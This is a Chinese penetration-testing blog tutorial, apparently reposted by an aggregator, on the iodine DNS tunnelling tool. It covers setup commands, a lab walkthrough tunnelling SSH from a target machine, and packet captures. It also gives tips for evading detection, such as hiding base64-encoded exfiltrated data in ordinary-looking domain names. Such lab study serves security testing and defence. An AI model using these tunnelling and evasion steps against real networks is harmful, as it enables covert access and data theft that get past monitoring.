内网渗透系列:内网隧道之iodine

Posted 思源湖的鱼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了内网渗透系列:内网隧道之iodine相关的知识,希望对你有一定的参考价值。

目录

前言

本文研究DNS隧道的一个经典工具,iodine

github:https://github.com/yarrick/iodine

一、概述

1、简介

持续更新,C语言编写,官方:http://code.kryo.se/iodine/

IPv4 over DNS,即通过DNS隧道转发IPv4数据包,在编码,请求类型上提供了更丰富的选择

  • 客户端为Win10时,环境搭建后,可连接成功,但无法ping通(即不可用!)
  • 支持直连和中继两种模式
  • 支持常见的DNS解析类型:A、CNAME、MX、TXT等

2、原理

DNS原理见:一文搞明白DNS与域名解析

通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一局域网(可以通过ping命令通信)。在客户端和服务端之间建立连接后,客户机上会多出一块“dns0”的虚拟网卡。
  
DNS隧道流程:iodine客户端->DNS服务商->iodined服务端

3、用法

(1)服务端

iodined -f -c -P <password> 10.0.0.1 vpn.abc.com -DD
-f:在前台运行
-c:禁止检查所有传入请求的客户端IP地址。
-P:客户端和服务端之间用于验证身份的密码。
-D:指定调试级别,-DD指第二级。“D”的数量随级别增加。
这里的10.0.0.1是自定义的局域网虚拟IP地址。

(2)客户端

linux环境:

iodine -f -P  <password> vpn.abc.ltd -M 200
-r:iodine有时会自动将DNS隧道切换为UDP隧道,该参数的作用是强制在任何情况下使用DNS隧道
-M:指定上行主机的大小。
-m:调节最大下行分片的大小。
-T:指定DNS请求类型TYPE,可选项有NULL、PRIVATE、TXT、SRV、CNAME、MX、A。
-O:指定数据编码规范。
-L:指定是否开启懒惰模式,默认开启。
-I:指定两个请求之间的时间间隔。

windows环境:

  • windows客户端可以直接使用编译好的windows版本,同时需要安装TAP网卡驱动程序。
  • 也可以下载OpenVPN,在安装时仅选择TAP-Win32驱动程序,安装后服务器上就会多出一块“TAP-Wndows ADApter V9”的网卡。
  • 运行客户端程序iodine:iodine -f -P <password> vpn.abc.com,如果出现提示“Connection setup complete, transmitting data”,就表示DNS隧道已经建立。

二、实践

1、测试场景

(1)攻击机

Kali2021 192.168.10.128

(2)DNS服务器

windows server 2008 :192.168.10.200

设置静态IP,参见https://blog.csdn.net/pockeyfan/article/details/42063683

新建A记录,指向服务端kali

新建一个委托(即NS记录)指向刚刚设定的A记录的域名

再建一个A记录指向windows server自己

(3)目标机

Ubuntu 18.04 192.168.10.129

由于模拟的是DNS服务器是真正的权威服务器,即目标机应该能DNS解析到DNS服务器,所以要把目标机的DNS解析改下


nslookup检测下

2、建立隧道

(1)服务端

建立隧道前状态

建立隧道

iodined -f -c -P 123456 10.0.0.1 dnstunnel.test.com -DD


此时多了一个网卡dns0,ip是我们设置的10.0.0.1

(2)客户端

建立隧道前状态

建立隧道

iodine -f -r -P 123456 dnstunnel.test.com


也是多了个网卡dns0,ip为10.0.0.2

(3)ssh

此时隧道建立成功,在服务端会打印出心跳包

尝试ssh

隧道成功建立,流量可代理
此时,打印出的包如下:

3、抓包看看

建立隧道,域名让人没眼看

虚拟网卡中TCP握手

心跳包,走了一个来回,域名太异常了

虚拟网卡中

ssh时

虚拟网卡中

三、探索

1、源码与分析

TODO

2、检测与绕过

(1)虚拟网卡

本工具会创建个虚拟网卡来处理TCP

没法避免

(2)记录类型

这对本工具问题不大,因为可以支持常见记录类型,上面实验里是没有指定,但可以指定为A就问题不大

(3)异常DNS数据包数量

利用隧道时,会有大量DNS数据包,且来自同一DNS服务器

绕过方法:中间加间隔,但这样就会导致速度非常慢

(4)异常域名

建立隧道和心跳包的域名都太异常了,使用隧道时的域名就更是长base64字符串了

绕过方法:心跳包用正常域名,使用隧道时将base64拆分,不过会大大增加数据包数量

比如现在要把一个文件名 finalexamanswer.doc 传出去
base64 一下 -> ZmluYWxleGFtYW5zd2VyLmRvYw
然后编码常用域名,变成 Zm -> zone.music.domain,lu -> login.user.domain,YW``yun.web.domain …

(5)心跳包

心跳包的间隔已经比较长了(3s),但是数量是问题

绕过方法:间隔可以随机,数量可以换UDP socket重新建立隧道

结语

类似于icmptunnel,构建虚拟网卡来实现隧道

以上是关于内网渗透系列:内网隧道之iodine的主要内容,如果未能解决你的问题,请参考以下文章

内网渗透系列:内网隧道之pingtunnel

内网渗透系列:内网隧道之NATBypass

内网渗透系列:内网隧道之icmpsh

内网渗透系列:内网隧道之icmpsh

内网渗透系列:内网隧道之icmp_tran

内网渗透系列:内网隧道之pingtunnel